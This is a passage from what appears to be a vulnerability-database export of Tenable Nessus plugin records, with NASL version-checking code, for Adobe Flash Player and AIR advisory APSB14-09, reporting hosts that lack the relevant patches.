(CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/2942844/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB2942844.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 13.0.0.182\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 13 ||\n (\n iver[0] == 13 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 182)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 13.0.0.182\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n # XSS\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect 
when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:33", "description": "Versions of Adobe AIR prior to 13.0.0.83 are unpatched for the following vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n - An unspecified error exists that could allow a security bypass leading to information disclosure. (CVE-2014-0508)\n - An unspecified error exists that could allow cross-site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Adobe AIR < 13.0.0.83 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "8809.PRM", "href": "https://www.tenable.com/plugins/nnm/8809", "sourceData": "Binary data 8809.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:24", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is equal or prior to 11.7.700.272 / 11.8.x / 11.9.x / 12.0.0.77. It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. 
(CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Flash Player for Mac <= 11.7.700.272 / 12.0.0.77 Multiple Vulnerabilities (APSB14-09) (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_13_0_0_182.NASL", "href": "https://www.tenable.com/plugins/nessus/73435", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73435);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n\n script_name(english:\"Flash Player for Mac <= 11.7.700.272 / 12.0.0.77 Multiple Vulnerabilities (APSB14-09) (Mac OS X)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is equal or prior to 11.7.700.272 / 11.8.x /\n11.9.x / 12.0.0.77. It is, therefore, potentially affected by multiple\nvulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. 
(CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. (CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.275 / 13.0.0.182 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nextended_cutoff_version = \"11.7.700.272\";\nextended_fixed_version = \"11.7.700.275\";\n\nstandard_cutoff_version = \"12.0.0.77\";\nstandard_fixed_version = \"13.0.0.182\";\n\nfixed_version_for_report = NULL;\n\nif (version =~ \"^([0-9]|10)\\.|^11\\.[0-6]\")\n fixed_version_for_report = extended_fixed_version;\n\nelse if (\n version =~ \"^11\\.7\\.\" &&\n ver_compare(ver:version, fix:extended_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = extended_fixed_version;\n\nelse if (version =~ \"^11\\.[89]\\.\") fixed_version_for_report = standard_fixed_version;\nelse if (\n version =~ \"^12\\.0\\.0\\.\" &&\n ver_compare(ver:version, fix:standard_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = standard_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n # XSS\n set_kb_item(name:'www/0/XSS', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:06", "description": "This flash-player update fixes several security issues :\n\n - bnc#872692: Security update to 11.2.202.350 :\n\n - APSB14-09, CVE-2014-0506, CVE-2014-0507, CVE-2014-0508, CVE-2014-0509", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": 
"nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2014:0549-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player-kde4", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-307.NASL", "href": "https://www.tenable.com/plugins/nessus/75328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-307.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75328);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2014:0549-1)\");\n script_summary(english:\"Check for the openSUSE-2014-307 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This flash-player update fixes several security issues :\n\n - bnc#872692: Security update to 11.2.202.350 :\n\n - APSB14-09, CVE-2014-0506, CVE-2014-0507, CVE-2014-0508,\n CVE-2014-0509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=872692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00050.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the 
affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", 
reference:\"flash-player-11.2.202.350-2.68.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.350-2.68.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.350-2.68.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.350-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.350-42.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.350-42.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:33", "description": "Adobe flash-player has been updated to version 11.2.202.350 to resolve security issues and bugs. More information can be found at\n\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-09.html\n\nThe following security issues have been fixed :\n\n - a use-after-free vulnerability that could have resulted in arbitrary code execution. (CVE-2014-0506)\n\n - a buffer overflow vulnerability that could have resulted in arbitrary code execution. (CVE-2014-0507)\n\n - a security bypass vulnerability that could have led to information disclosure. (CVE-2014-0508)\n\n - a cross-site scripting vulnerability. 
(CVE-2014-0509)", "cvss3": {}, "published": "2014-04-17T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : flash-player (SAT Patch Number 9120)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:flash-player", "p-cpe:/a:novell:suse_linux:11:flash-player-gnome", "p-cpe:/a:novell:suse_linux:11:flash-player-kde4", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_FLASH-PLAYER-140411.NASL", "href": "https://www.tenable.com/plugins/nessus/73591", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73591);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n\n script_name(english:\"SuSE 11.3 Security Update : flash-player (SAT Patch Number 9120)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe flash-player has been updated to version 11.2.202.350 to resolve\nsecurity issues and bugs. More information can be found at\n\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-09.html\n\nThe following security issues have been fixed :\n\n - a use-after-free vulnerability that could have resulted\n in arbitrary code execution. 
(CVE-2014-0506)\n\n - a buffer overflow vulnerability that could have resulted\n in arbitrary code execution. (CVE-2014-0507)\n\n - a security bypass vulnerability that could have lead to\n information disclosure. (CVE-2014-0508)\n\n - a cross-site scripting vulnerability. (CVE-2014-0509)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=872692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0506.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0507.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0508.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-0509.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9120.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.350-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.350-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:33", "description": "Versions of Adobe Flash player prior to 11.7.700.275 / 13.0.0.182 are outdated and thus unpatched for the following vulnerabilities :\n\n - A use-after-free error 
affects the handling of ExternalInterface. With a specially crafted flash object, a context-dependent attacker can dereference already freed memory and potentially execute arbitrary code. (CVE-2014-0506)\n - An overflow condition exists which is triggered as user-supplied input is not properly validated when handling ActionScript regular expressions. This may allow a context-dependent attacker to cause a stack-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code. (CVE-2014-0507)\n - An unspecified flaw that may allow a context-dependent attacker to bypass security restrictions and gain access to potentially sensitive information. (CVE-2014-0508)\n - A flaw exists that allows a cross-site scripting (XSS) attack. This flaw exists because the applications do not validate input passed to the 'ExternalInterface.call()' function before returning it to users. This may allow a context-dependent attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. (CVE-2014-0509)", "cvss3": {}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Flash Player < 11.7.700.275 / 13.0.0.182 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "8806.PRM", "href": "https://www.tenable.com/plugins/nnm/8806", "sourceData": "Binary data 8806.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:31", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is equal or prior to 11.7.700.272 / 11.8.x / 11.9.x / 12.0.0.77. 
It is, therefore, potentially affected by multiple vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-site scripting attacks. (CVE-2014-0509)", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Flash Player <= 11.7.700.272 / 12.0.0.77 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB14-09.NASL", "href": "https://www.tenable.com/plugins/nessus/73433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73433);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n\n script_name(english:\"Flash Player <= 11.7.700.272 / 12.0.0.77 Multiple Vulnerabilities (APSB14-09)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Windows host is equal or prior to 11.7.700.272 / 11.8.x /\n11.9.x / 12.0.0.77. 
It is, therefore, potentially affected multiple\nvulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. (CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/531839/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 11.7.700.275 / 13.0.0.182 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This 
script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\", \"Chrome_Pepper\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n (\n # Chrome Flash <= 12.0.0.77\n variant == \"Chrome_Pepper\" &&\n (iver[0] == 12 && iver[1] == 0 && iver[2] == 0 && iver[3] <= 77)\n ) ||\n (variant != \"Chrome_Pepper\" &&\n (\n # < 11\n iver[0] < 11 ||\n # 11.x <= 11.7.700.272\n (\n iver[0] == 11 &&\n (\n iver[1] < 7 ||\n (\n iver[1] == 7 &&\n (\n iver[2] < 700 ||\n (iver[2] == 700 && iver[3] <= 272)\n )\n )\n )\n ) ||\n # 11.8.x\n (iver[0] == 11 